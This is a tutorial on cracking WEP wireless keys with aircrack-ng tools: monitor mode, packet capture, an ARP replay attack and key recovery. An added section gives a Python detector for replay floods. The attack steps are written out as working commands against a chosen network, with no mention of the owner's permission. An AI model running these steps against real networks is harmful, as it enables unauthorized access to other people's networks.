In this tutorial I'll demonstrate how to crack a wireless password protected with WEP encryption.
## Let's get started
For this purpose we are going to use the live CD distribution BackTrack 4 (version 5 works as well) and some of the applications in it.
**Note:** You need to be root first. To do so, type `su` and enter your password.
Once BackTrack is up and running, it's time to open a terminal and switch the wireless interface to monitor mode using the following command:
```
# iwconfig wlan0 mode monitor
```
**Note:** If an error occurs, run `iwconfig` in a terminal to check for your wireless interface.
After that it's time to scan for a wireless network, which we will compromise for educational purposes. This time we will use the command:
```
# airodump-ng wlan0
```
![Image](http://store.picbg.net/pubpic/D5/68/be11f84f0e27d568.jpg)
Once you've found one, abort the process with Ctrl+C. Now that we have our target, it's time to collect some information about the network. First of all, copy the MAC address of the access point, which is listed under BSSID (it should look something like 00:15:EB:E7: ). We also need to know the channel it's currently working on (shown under CH, e.g. 6). So let's gather our information with airodump-ng.
```
# airodump-ng -w wep -c 6 --bssid 00:15:EB:E7: wlan0
```
![Image](http://store.picbg.net/pubpic/43/2C/8875fd4ff599432c.jpg)
Now we need to open another terminal, in which we will use an ARP request replay attack to increase the number of data packets and gather the initialization vectors (IVs) of the access point chosen earlier.
```
# aireplay-ng -3 -b 00:15:EB:E7: wlan0
```
![Image](http://store.picbg.net/pubpic/E1/EE/b15c84ed10ebe1ee.jpg)
Let's go back to terminal 1 and have a look at the data packets. We need to have collected over 20 000 packets. Once we have, abort both airodump-ng and aireplay-ng.
Now we have everything required to recover the key of the wireless network. We do that with aircrack-ng as shown below:
```
# aircrack-ng wep-03.cap
```
![Image](http://store.picbg.net/pubpic/7C/01/537f3d09952d7c01.jpg)
You should then see that the key has been decrypted 100% successfully, along with the key itself.
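Seen from the network owner's side, the ARP replay step above leaves a distinctive traffic pattern: one station sending the same-sized broadcast data frame through the access point hundreds of times per second. The following is an added example, not part of the original tutorial, showing a sliding-window check for that pattern. The record layout, the window and threshold values, and the sample frames are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_replay_floods(frames, window_ms=1000, threshold=50):
    """Flag senders whose identical-length broadcast data frames reach
    `threshold` within `window_ms`. Returns {(bssid, src, length): peak count}.
    Each frame is (time_ms, bssid, source, destination, length)."""
    recent = defaultdict(deque)  # key -> timestamps still inside the window
    peaks = {}
    for ts, bssid, src, dst, length in sorted(frames):
        if dst != BROADCAST:
            continue  # replayed ARP requests are addressed to broadcast
        key = (bssid, src, length)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_ms:
            q.popleft()  # drop timestamps that fell out of the window
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks

def sample_capture():
    """Constructed frame metadata, not taken from a real capture."""
    ap = "02:00:00:00:00:01"
    client = "02:00:00:00:00:10"
    flooder = "02:00:00:00:00:66"
    frames = []
    # Ordinary client: one broadcast frame every 2 seconds
    frames += [(t * 2000, ap, client, BROADCAST, 68) for t in range(10)]
    # Ordinary client: fast unicast traffic, which must not be flagged
    frames += [(t * 5, ap, client, ap, 1500) for t in range(400)]
    # Replay pattern: the same 68-byte broadcast frame every 2 ms
    frames += [(5000 + t * 2, ap, flooder, BROADCAST, 68) for t in range(1000)]
    return frames

if __name__ == "__main__":
    for (bssid, src, length), peak in detect_replay_floods(sample_capture()).items():
        print(f"possible ARP replay via {bssid}: {src} sent "
              f"{peak} x {length}-byte broadcast frames within 1 s")
```

Because WEP encrypts the payload, the check relies only on metadata that stays visible on the air: addresses, frame length and timing.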